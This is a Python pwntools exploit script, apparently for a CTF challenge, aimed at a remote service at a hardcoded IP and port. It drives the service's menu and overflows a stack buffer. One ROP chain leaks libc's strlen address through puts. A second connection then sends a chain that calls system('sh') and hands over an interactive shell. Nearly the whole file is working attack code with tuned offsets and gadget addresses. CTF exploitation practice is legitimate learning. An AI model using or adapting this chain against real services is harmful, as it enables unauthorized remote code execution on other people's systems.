from pwn import *
# Remote CTF service that runs the vulnerable binary.
HOST = '52.1.91.215'
PORT = 2114

# The binary is only loaded locally to resolve addresses; nothing is executed.
elf = ELF('har/harvard')
# GOT slot whose contents (libc's strlen pointer) the leak chain prints.
strlen_got = elf.got['strlen']
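def preproc(r):
    """Walk the service's menu up to the point where the overflowing read occurs.

    The transcript is reproduced verbatim from the original script.  The first
    answer is 40 bytes with a code address (0x4017df) at offset 24; the original
    does not document its role - verify against the binary before changing it.

    Args:
        r: pwntools tube connected to the target.

    Note: the original listing had lost its indentation (it did not parse as
    written) and mixed ``str`` with ``p64()`` output, which only works on
    Python 2.  Byte literals keep the byte stream identical on both Python 2
    and Python 3 pwntools.
    """
    r.recvuntil(b";-) : ")
    r.send(b"A" * 8 + b"B" * 8 + b"C" * 8 + p64(0x4017df) + b"D" * 7 + b"\n")
    r.recvuntil(b"Sleep\n")
    r.send(b"1\n")
    r.recvuntil(b"Windows\n")
    r.send(b"1\n")
    r.recvuntil(b"buy?\n")
    r.send(b"1\n")
    r.recvuntil(b"Sleep\n")
    r.send(b"4\n")
    r.recvuntil(b"Brookline) ")
    r.send(b"1\n")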
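# --- exploit ----------------------------------------------------------------
# Gadget / symbol addresses are taken from the original script.  The libc
# offsets are for the *remote* libc build only; re-derive them (e.g.
# `nm -D libc.so.6` or a libc-database lookup) if the target's libc changes.
POP_RDI_RET = 0x0000000000402fc3   # pop rdi; ret
PUTS_PLT = 0x00000000004024ec      # puts() entry used to print the GOT slot
SH_STR = 0x4006be                  # address of "sh" inside the binary
LIBC_STRLEN_OFF = 0x0000000000089650
LIBC_SYSTEM_OFF = 0x0000000000046640
RET_PAD = 280                      # bytes from the read buffer to the saved rip
READ_LEN = 399                     # bytes the vulnerable read takes before "\n"


def libc_system(strlen_addr):
    """Return system()'s address given the leaked address of libc's strlen().

    The distance between two symbols inside one libc build is fixed, so
    system = strlen - strlen_off + system_off (same arithmetic as the original).
    """
    return strlen_addr - LIBC_STRLEN_OFF + LIBC_SYSTEM_OFF


def rop_payload(chain):
    """Prefix *chain* with the overflow padding and pad the line to READ_LEN bytes.

    Returns the full line including the trailing newline.
    Raises ValueError if the chain does not fit; the original silently
    multiplied by a negative count and sent a short line instead.
    """
    payload = b"A" * RET_PAD + chain
    if len(payload) > READ_LEN:
        raise ValueError("ROP chain too long: %d > %d" % (len(payload), READ_LEN))
    return payload + b"A" * (READ_LEN - len(payload)) + b"\n"


def leak_libc(r):
    """Leak libc's strlen() address via puts(strlen@got) and return it as an int.

    puts() stops at the first NUL, so a libc pointer arrives as its 6 low bytes
    followed by a newline; they are zero-extended to 8 bytes before unpacking.
    Raises ValueError if the service printed nothing or more than 8 bytes.
    """
    r.send(rop_payload(p64(POP_RDI_RET) + p64(strlen_got) + p64(PUTS_PLT)))
    r.recvuntil(b"\n")
    r.recvuntil(b"!\n")
    raw = r.recv()[:-1]  # drop the newline puts() appends
    if not 1 <= len(raw) <= 8:
        raise ValueError("unexpected leak length %d: %r" % (len(raw), raw))
    leak = u64(raw.ljust(8, b"\x00"))
    # A user-space libc on x86-64 Linux is normally mapped at 0x7f..; anything
    # else usually means the menu transcript desynced or the libc differs.
    if leak >> 40 != 0x7f:
        log.warning("leak %#x does not look like a libc address" % leak)
    return leak


def spawn_shell(r, system_address):
    """Send the system("sh") chain and hand the tube to the user."""
    # NOTE(review): if system() faults on a movaps (16-byte stack alignment),
    # insert a lone `ret` gadget before POP_RDI_RET - the original chain has none.
    r.send(rop_payload(p64(POP_RDI_RET) + p64(SH_STR) + p64(system_address)))
    r.interactive()


if __name__ == "__main__":
    # Two connections are needed: the leak chain crashes the process once
    # puts() returns.  Reusing the leaked base on a second connection only
    # works if the service forks (same ASLR base per child); a re-exec'd
    # process would get a fresh base.  The original relies on this too.
    r = remote(HOST, PORT)
    preproc(r)
    leak = leak_libc(r)
    r.close()  # the original left this socket open
    system_address = libc_system(leak)
    print("get system address: 0x%016x" % system_address)

    r = remote(HOST, PORT)
    preproc(r)
    spawn_shell(r, system_address)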